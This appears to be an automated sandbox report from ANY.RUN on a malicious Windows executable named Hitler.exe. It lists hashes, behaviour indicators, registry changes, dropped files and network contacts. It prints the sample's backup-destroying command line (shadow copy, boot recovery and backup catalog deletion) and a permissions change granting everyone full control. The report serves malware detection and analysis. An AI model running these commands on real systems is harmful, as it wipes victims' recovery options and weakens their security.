File name:

Hitler.exe

Full analysis: https://app.any.run/tasks/6764cd4d-5532-4db9-b628-d3fe68f92598
Verdict: Malicious activity
Analysis date: October 01, 2024, 09:15:26
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
ip-check
upx
evasion
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
MD5:

E64DBE09FC1805177D9058A40807E128

SHA1:

FC15F43BE27987315C8BCF61FF392FF8AC3E394C

SHA256:

9AE7D51B7C3E729D9FD0EB7B99811DE3270E7B37931FFF1F136EFEB50D276A4C

SSDEEP:

98304:1KAeO3aJCht7w1vmAGkJLptIBdMLKRaIAx8aRDS8TwSsxQt1bzx4bO+L4dr0QTDh:k0

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Deletes shadow copies

      • cmd.exe (PID: 3076)

    • UAC/LUA settings modification

      • Hitler.exe (PID: 2044)

    • Changes the autorun value in the registry

      • Hitler.exe (PID: 2044)

  • SUSPICIOUS

    • Reads security settings of Internet Explorer

      • Hitler.exe (PID: 2044)

    • There is functionality for capture public ip (YARA)

      • Hitler.exe (PID: 2044)

    • Executes as Windows Service

      • VSSVC.exe (PID: 6100)

    • Checks for external IP

      • Hitler.exe (PID: 2044)

    • Starts CMD.EXE for commands execution

      • Hitler.exe (PID: 2044)

    • Creates file in the systems drive root

      • Hitler.exe (PID: 2044)

    • Connects to SMTP port

      • Hitler.exe (PID: 2044)

    • Uses ICACLS.EXE to modify access control lists

      • Hitler.exe (PID: 2044)

    • There is functionality for taking screenshot (YARA)

      • Hitler.exe (PID: 2044)

  • INFO

    • Reads the computer name

      • Hitler.exe (PID: 2044)

    • Creates files or folders in the user directory

      • Hitler.exe (PID: 2044)

    • Checks supported languages

      • Hitler.exe (PID: 2044)

    • Create files in a temporary directory

      • Hitler.exe (PID: 2044)

    • Checks proxy server information

      • Hitler.exe (PID: 2044)

    • Reads the machine GUID from the registry

      • Hitler.exe (PID: 2044)

    • UPX packer has been detected

      • Hitler.exe (PID: 2044)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (33.3)
.exe | UPX compressed Win32 Executable (32.6)
.scr | Windows screen saver (15.8)
.dll | Win32 Dynamic Link Library (generic) (7.9)
.exe | Win32 Executable (generic) (5.4)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2017:11:05 04:11:25+00:00
ImageFileCharacteristics: No relocs, Executable, No line numbers, No symbols, 32-bit
PEType: PE32
LinkerVersion: 6
CodeSize: 3190784
InitializedDataSize: 335872
UninitializedDataSize: 1032192
EntryPoint: 0x407760
OSVersion: 4
ImageVersion: -
SubsystemVersion: 4
Subsystem: Windows GUI
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
133
Monitored processes
9
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start THREAT hitler.exe icacls.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs wmic.exe no specs shellexperiencehost.exe no specs vssvc.exe no specs hitler.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1884\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exeicacls.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2008"C:\Users\admin\Desktop\Hitler.exe" C:\Users\admin\Desktop\Hitler.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
3221226540
Modules
Images
c:\users\admin\desktop\hitler.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
2044"C:\Users\admin\Desktop\Hitler.exe" C:\Users\admin\Desktop\Hitler.exe
explorer.exe
User:
admin
Integrity Level:
HIGH
Modules
Images
c:\users\admin\desktop\hitler.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\advapi32.dll
2116\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2132"C:\WINDOWS\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mcaC:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Shell Experience Host
Version:
10.0.19041.3758 (WinBuild.160101.0800)
Modules
Images
c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\wincorlib.dll
2224wmic shadowcopy delete C:\Windows\SysWOW64\wbem\WMIC.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
WMI Commandline Utility
Exit code:
2147749908
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\wbem\wmic.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
3076cmd /c vssadmin delete shadow /all /quiet & wmic shadowcopy delete & bcdedit /set {default} boostatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietC:\Windows\SysWOW64\cmd.exeHitler.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
5988icacls . /grant Everyone:F /T /C /QC:\Windows\SysWOW64\icacls.exeHitler.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\icacls.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
6100C:\WINDOWS\system32\vssvc.exeC:\Windows\System32\VSSVC.exeservices.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Microsoft® Volume Shadow Copy Service
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\vssvc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
22 233
Read events
22 226
Write events
7
Delete events
0

Modification events

(PID) Process:(2044) Hitler.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Operation:writeName:EnableLUA
Value:
0
(PID) Process:(2044) Hitler.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:Adolf Hitler
Value:
C:\Users\admin\Desktop\Hitler.exe
(PID) Process:(2044) Hitler.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(2044) Hitler.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(2044) Hitler.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(2132) ShellExperienceHost.exeKey:\REGISTRY\A\{876611b9-7607-26c7-3fbd-c5b19abd613e}\LocalState
Operation:writeName:PeekBadges
Value:
5B005D0000005E1B987CE213DB01
(PID) Process:(2132) ShellExperienceHost.exeKey:\REGISTRY\A\{876611b9-7607-26c7-3fbd-c5b19abd613e}\LocalState
Operation:writeName:PeekBadges
Value:
5B005D000000CB91987CE213DB01
Executable files
2
Suspicious files
2 754
Text files
11
Unknown types
0

Dropped files

PID
Process
Filename
Type
2044Hitler.exe
MD5:
SHA256:
2044Hitler.exeC:\$WinREAgent\Backup\Winre.AdolfHitler
MD5:
SHA256:
2044Hitler.exeC:\$WinREAgent\Scratch\update.AdolfHitler
MD5:
SHA256:
2044Hitler.exeC:\Users\admin\AppData\Local\Temp\_Adolf Hitler_.mp3binary
MD5:3903D19844A4E4DFB0CD919842B01CCD
SHA256:C1B11091D66E6E89C0E190AEF1BFD7C5D566BCB03FB90E1A5CB8E8462387CEB4
2044Hitler.exeC:\$Recycle.Bin\S-1-5-21-1693682860-607145093-2874071422-1000\desktop.AdolfHitlerini
MD5:A526B9E7C716B3489D8CC062FBCE4005
SHA256:E1B9CE9B57957B1A0607A72A057D6B7A9B34EA60F3F8AA8F38A3AF979BD23066
2044Hitler.exeC:\_Adolf Hitler_.bmpimage
MD5:9EA2048780F96D11B4CE6EA76623B94D
SHA256:DEDF660BCC7C477A370F2C0899B7E01F9DC73D1EDF12BE0201F6D9C528B43D95
2044Hitler.exeC:\Users\admin\Desktop\AdolfHitlerbinary
MD5:D9364029A39FF14634FF132E2786CB47
SHA256:C399AF25EAFAF9D89B33C5F0613D00B690BE5C11163DE45AA2F5D5739EFBB05F
2044Hitler.exeC:\found.000\file00000004.AdolfHitler
MD5:
SHA256:
2044Hitler.exeC:\Users\admin\Desktop\_Adolf Hitler_.bmpimage
MD5:9EA2048780F96D11B4CE6EA76623B94D
SHA256:DEDF660BCC7C477A370F2C0899B7E01F9DC73D1EDF12BE0201F6D9C528B43D95
2044Hitler.exeC:\$Recycle.Bin\S-1-5-21-1693682860-607145093-2874071422-1001\desktop.AdolfHitlerini
MD5:A526B9E7C716B3489D8CC062FBCE4005
SHA256:E1B9CE9B57957B1A0607A72A057D6B7A9B34EA60F3F8AA8F38A3AF979BD23066
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
35
DNS requests
11
Threats
3

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
7108
svchost.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
2044
Hitler.exe
GET
200
103.235.46.96:80
http://www.baidu.com/
unknown
whitelisted
2044
Hitler.exe
GET
301
138.113.149.152:80
http://www.ip138.com/
unknown
whitelisted
2044
Hitler.exe
GET
200
174.35.118.62:80
http://top.ip138.com/
unknown
unknown
GET
302
174.35.118.62:443
https://www.ip138.com/
unknown
html
138 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3888
svchost.exe
239.255.255.250:1900
whitelisted
192.168.100.255:137
whitelisted
7108
svchost.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
20.49.150.241:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
GB
whitelisted
7108
svchost.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
2044
Hitler.exe
103.235.46.96:80
www.baidu.com
Beijing Baidu Netcom Science and Technology Co., Ltd.
HK
whitelisted
7108
svchost.exe
20.49.150.241:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
GB
whitelisted
2044
Hitler.exe
103.129.252.45:25
smtp.163.com
NETEASE HONG KONG LIMITED
HK
shared

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
  • 20.49.150.241
  • 20.73.194.208
whitelisted
google.com
  • 142.250.184.206
whitelisted
www.microsoft.com
  • 95.101.149.131
whitelisted
www.baidu.com
  • 103.235.46.96
  • 103.235.47.188
whitelisted
smtp.163.com
  • 103.129.252.45
shared
www.ip138.com
  • 138.113.149.152
  • 163.171.129.134
  • 174.35.118.62
  • 174.35.118.63
whitelisted
top.ip138.com
  • 174.35.118.62
  • 138.113.101.14
  • 174.35.118.63
  • 163.171.129.134
unknown

Threats

PID
Process
Class
Message
2044
Hitler.exe
Generic Protocol Command Decode
SURICATA SMTP no server welcome message
2 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Hitler.exe